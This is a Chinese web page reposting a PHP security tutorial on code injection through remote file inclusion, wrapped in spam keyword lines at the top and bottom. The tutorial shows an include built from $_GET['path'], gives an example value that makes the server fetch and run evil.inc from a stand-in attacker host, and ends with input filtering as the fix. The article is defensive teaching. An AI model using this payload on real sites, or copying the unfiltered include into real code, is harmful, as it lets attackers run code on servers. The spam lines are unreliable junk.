国产成人精品亚洲777人妖,欧美日韩精品一区视频,最新亚洲国产,国产乱码精品一区二区亚洲

您的位置:首頁技術(shù)文章
文章詳情頁

PHP安全-代碼注入

瀏覽:214日期:2022-09-12 08:03:12
代碼注入

一個特別危險的情形是當(dāng)你試圖使用被污染數(shù)據(jù)作為動態(tài)包含的前導(dǎo)部分時:

<?php

include '{$_GET[’path’]}/header.inc';

?>

在這種情形下攻擊者能操縱不只是文件名,還能控制所包含的資源。由于PHP默認(rèn)不只可以包含文件,還可以包含下面的資源(由配置文件中的allow_url_fopen所控制):

<?php

include ’http://www.google.com/’;

?>

include語句在此時會把http://www.google.com的網(wǎng)頁源代碼作為本地文件一樣包含進(jìn)來。雖然上面的例子是無害的,但是想像一下如果GOOGLE返回的源代碼包含PHP代碼時會如何。這樣其中包含的PHP代碼就會被解析并執(zhí)行。這是攻擊者借以發(fā)布惡意代碼摧毀你的安全體系的良機(jī)。

想象一下path的值指向了下面的攻擊者所控制的資源:

http://example.org/index.php?pat ... e.org%2Fevil.inc%3F

在上例中,path的值是URL編碼過的,原值如下:

http://evil.example.org/evil.inc?

這就導(dǎo)致了include語句包含并執(zhí)行了攻擊者所選定的腳本(evil.inc),同時原來的文件名/header.inc會被認(rèn)為是一個請求串:

<?php

include 'http://evil.example.org/evil.inc?/header.inc';

?>

這樣攻擊者就避免了去猜測剩下的目錄和文件名(/header.onc)并在evil.example.org上建立相同的路徑和文件名的必要性。相反地,在受攻擊網(wǎng)站的具體文件名被屏蔽的情況下,他只要保證evil.inc中輸出合法的他想要執(zhí)行的代碼就行了。

這種情況與允許攻擊者在你的網(wǎng)站上直接修改PHP代碼一樣危險。幸運的是,只要在include和require語句前對數(shù)據(jù)進(jìn)行過濾即可防止這種情況的發(fā)生:

<?php

$clean = array();

/* $_GET[’path’] is filtered and stored in $clean[’path’]. */

include '{$clean[’path’]}/header.inc';

?>

標(biāo)簽: PHP
相關(guān)文章:
主站蜘蛛池模板: 六盘水市| 偏关县| 衡阳市| 雅江县| 石林| 托里县| 晋城| 日土县| 龙井市| 云南省| 荥经县| 西平县| 合肥市| 乐业县| 咸阳市| 赤水市| 翁源县| 宽城| 吉水县| 年辖:市辖区| 天镇县| 海阳市| 徐水县| 余干县| 辽中县| 亳州市| 安丘市| 石首市| 桐梓县| 甘孜县| 沈阳市| 拜城县| 南开区| 克拉玛依市| 大港区| 偏关县| 德州市| 行唐县| 秦安县| 湄潭县| 维西|